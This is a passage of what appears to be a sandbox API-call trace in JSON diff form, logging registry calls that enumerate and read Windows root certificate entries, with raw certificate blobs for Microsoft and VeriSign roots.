"\\x18\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xd0U\\xcb\\xf4\\x0e~\\xdb\\x01\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots\\Certificates" + } + ], + "repeated": 0, + "id": 1971 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x768138b2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000578" + } + ], + "repeated": 0, + "id": 1972 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x768136be", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000574" + } + ], + "repeated": 0, + "id": 1973 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates" + } + ], + "repeated": 0, + "id": 1974 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "KeyInformation", + "value": "\\xffa0\\xfff9q%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1975 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 1976 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000580" + }, + { + "name": "ObjectAttributesName", + "value": "0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8" + } + ], + "repeated": 0, + "id": 1977 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8\\Blob" + } + ], + "repeated": 1, + "id": 1978 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00|\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xfc\\x02\\xa4\\x9e.\\x1e\\x8eH\\x8c\\xa2\\x91!5W,\\xc2\\xf8\\xe7\\x1b\\xb0\\xe2\\xf2\\x85\\x96\\xb3r\"\\x99\\xf5\\xcb\\x9cb\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x84's\\x95\\x00\\x86\\xd0k\\x04\\xd7\\x02-b\\xa2\\x84\\xbek\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00e\\xaf\\x95\\xf4\\xbe\\x86\\x84sDcB\\x82\\xf9A\\xb2\\xe6\\x05\\x06>\\xf0\\xc8T/\\x01L\\xa0\\x88\\xd1\\x82\\x10\\x9eO\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00j\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00T\\x00i\\x00m\\x00e\\x00 \\x00S\\x00t\\x00a\\x00m\\x00p\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x004\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x19\\xe8\\x1b\\xe9\\xa1L\\xd8\\xe2/@\\xac\\x11\\x8ch~\\xcb\\xa3\\xf4\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x004\\xf7&\\x98\\xd7\\x0e#\\x1f\\x8d\\xc4[W\\xf1\\x18\\xa4K\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xe4\\xa2\\xf6\\xfe\\x9c\\xa7\\xf1\\x8a+\\xeb\\xa9aa0\\x8b\\xaa\\x88\\x80\\xb0\\x13\\x16\\x1d\\xdd\\x852\\xd4%\\x9e'\\xe5\\x05p\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xcb\\xd1\\xf2\\xceH\\xfd\\x01\\x9f\\xeaV\\xaaW\\xd1~\\x99X\\xf8?\\xff\\xe0Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x06\\x00\\x000\\x82\\x06\\x030\\x82\\x03\\xeb\\xa0\\x03\\x02\\x01\\x02\\x02\\x10/\\xd6zC\"\\x932\\x90E\\xe9S4>\\xe2tf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x931\\x0b0\t\\x06" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8\\Blob" + } + ], + "repeated": 0, + "id": 1979 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000584" + } + ], + "repeated": 0, + "id": 1980 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 1981 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000580" + }, + { + "name": "ObjectAttributesName", + "value": "06F1AA330B927B753A40E68CDF22E34BCBEF3352" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352" + } + ], + "repeated": 0, + "id": 1982 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352\\Blob" + } + ], + "repeated": 1, + "id": 1983 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\\x00\\x00\\x00E\\x00C\\x00D\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x003\\x008\\x004\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\x9e}\\x1e\\x8d]\\xa1\\x1d\\xc0\\xc8K\\x07W\\xec\\xed\\xcb\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x002\\x99\\x19\\x81\\xbf\\x15u\\xa1\\xa50;\\xb9:8\\x17#\\xea4k\\x9e\\xc10\\xfd\\xb5\\x96\\xa7[\\xa1\\xd7\\xce\\x0b\n\\x06W\\x0b\\xb9\\x85\\xd2XA\\xe2;\\xe9D\\xe8\\xff\\x11\\x8f\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00l\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00E\\x00C\\x00C\\x00 \\x00P\\x00r\\x00o\\x00d\\x00u\\x00c\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x008\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x06\\xf1\\xaa3\\x0b\\x92{u:@\\xe6\\x8c\\xdf\"\\xe3K\\xcb\\xef3R\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x1f\\x12N\\xde\\x13\\xe0j\\x02<\\xd7\\xc0\\x9aOH\\xc3\\xd6\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00C\\xefp\\x87\\xb8\\x9d\\xbf\\xec\\x88\\x19\\xdc\\xc6\\xc4ku\ru43\\x08\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00'\\x03\\x00\\x000\\x82\\x03#0\\x82\\x02\\xa8\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x14\\x98&f\\xdc|\\xcd\\x8f@Sg{\\xb9\\x99\\xec\\x850\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030\\x81\\x941\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft C" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352\\Blob" + } + ], + "repeated": 0, + "id": 1984 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000584" + } + ], + "repeated": 0, + "id": 1985 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 1986 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000580" + }, + { + "name": "ObjectAttributesName", + "value": "18F7C1FCC3090203FD5BAA2F861A754976C8DD25" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25" + } + ], + "repeated": 0, + "id": 1987 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\Blob" + } + ], + "repeated": 1, + "id": 1988 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe5=4\\xce\\xcb\\x05\\xc1~\\xe32\\xc7I\\xd7\\x8c\\x02V\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00e\\xfcGR\\x0ff89b\\xec\\x0b{\\x88\\xa0\\x82\\x1d\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x18\\xf7\\xc1\\xfc\\xc3\t\\x02\\x03\\xfd[\\xaa/\\x86\\x1auIv\\xc8\\xdd%\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00T\\x00i\\x00m\\x00e\\x00 \\x00S\\x00t\\x00a\\x00m\\x00p\\x00i\\x00n\\x00g\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00>\\xdf)\\x0c\\xc1\\xf5\\xccs,\\xeb=$\\xe1~R\\xda\\xbd'\\xe2\\xf0 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xc0\\x02\\x00\\x000\\x82\\x02\\xbc0\\x82\\x02%\\x02\\x10J\\x19\\xd28\\x8c\\x82Y\\x1c\\xa5]s_\\x15]\\xdc\\xa30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1,0*\\x06\\x03U\\x04\\x0b\\x13#VeriSign Time Stamping Service Root1402\\x06\\x03U\\x04\\x0b\\x13+NO LIABILITY ACCEPTED, (c)97 VeriSign, Inc.0\\x1e\\x17\r970512000000Z\\x17\r040107235959Z0\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, I" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\Blob" + } + ], + "repeated": 0, + "id": 1989 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000584" + } + ], + "repeated": 0, + "id": 1990 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "Index", + "value": "3" + } + ], + "repeated": 0, + "id": 1991 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000580" + }, + { + "name": "ObjectAttributesName", + "value": "245C97DF7514E7CF2DF8BE72AE957B9E04741E85" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85" + } + ], + "repeated": 0, + "id": 1992 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\Blob" + } + ], + "repeated": 1, + "id": 1993 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x7f\\xdf\\xf5\\x07)Dg\\x10$JD|\\xa2\\xa1\\x97\\xea\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x9d\\xf0\\xd11\\x00\\x12:\\xec\\xa7p\\x13\\x0fJ\\xd8\\xd2\t\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x002\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00T\\x00i\\x00m\\x00e\\x00s\\x00t\\x00a\\x00m\\x00p\\x00 \\x00R\\x00o\\x00o\\x00t\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00$\\\\x97\\xdfu\\x14\\xe7\\xcf-\\xf8\\xber\\xae\\x95{\\x9e\\x04t\\x1e\\x85\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x004O0-%i1\\x91\\xea\\xf7s\\\\xab\\xf5\\x86\\x8d7\\x82@\\xec \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb1\\x02\\x00\\x000\\x82\\x02\\xad0\\x82\\x02\\x16\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03U\\x04\\x0b\\x13$Microsoft Time Stamping Service Root1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.0\\x1e\\x17\r970513161259Z\\x17\r991230235959Z0\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\Blob" + } + ], + "repeated": 0, + "id": 1994 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000584" + } + ], + "repeated": 0, + "id": 1995 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "Index", + "value": "4" + } + ], + "repeated": 0, + "id": 1996 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000580" + }, + { + "name": "ObjectAttributesName", + "value": "31F9FC8BA3805986B721EA7295C65B3A44534274" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\31F9FC8BA3805986B721EA7295C65B3A44534274" + } + ], + "repeated": 0, + "id": 1997 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\31F9FC8BA3805986B721EA7295C65B3A44534274\\Blob" + } + ], + "repeated": 1, + "id": 1998 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\\x00\\x00\\x00E\\x00C\\x00D\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x003\\x008\\x004\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe8G\\xc8B\\x9a\\xb0\\x9d\\xaeo\\x0b(;\\x98\\x15\\x8f\\xe3\\xb1\\xe8\\x80\\xb2\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x03\\xd1\\xc7ge\\xed\\xa8\\x8b\\xc8\\xe0\\x87^`\\x91\\xd0`C%C\\xd1\\x80\\xbc\\xb8l\\x06I6\\xad\\xb9A\\xc4!cx\\x0b\\x82\\x89\\x92\\x1a\\x94\\xfe\\xbb\\x7f\\x9eG\\xed\\xac\\x12\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x007\\x94)X\\x86*\\x06\\xe6\\xbb\\xcf\\xd7\\xabY\\xc7\\xf2\\xf6c\\xec\\xdf@0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r970110070000Z\\x17\r201231070000Z0p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft R" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\A43489159A520F0D93D032CCAF37E7FE20A8B419\\Blob" + } + ], + "repeated": 0, + "id": 2025 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000584" + } + ], + "repeated": 0, + "id": 2026 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "Index", + "value": "10" + } + ], + "repeated": 0, + "id": 2027 + }, + { + "timestamp": "2025-03-07 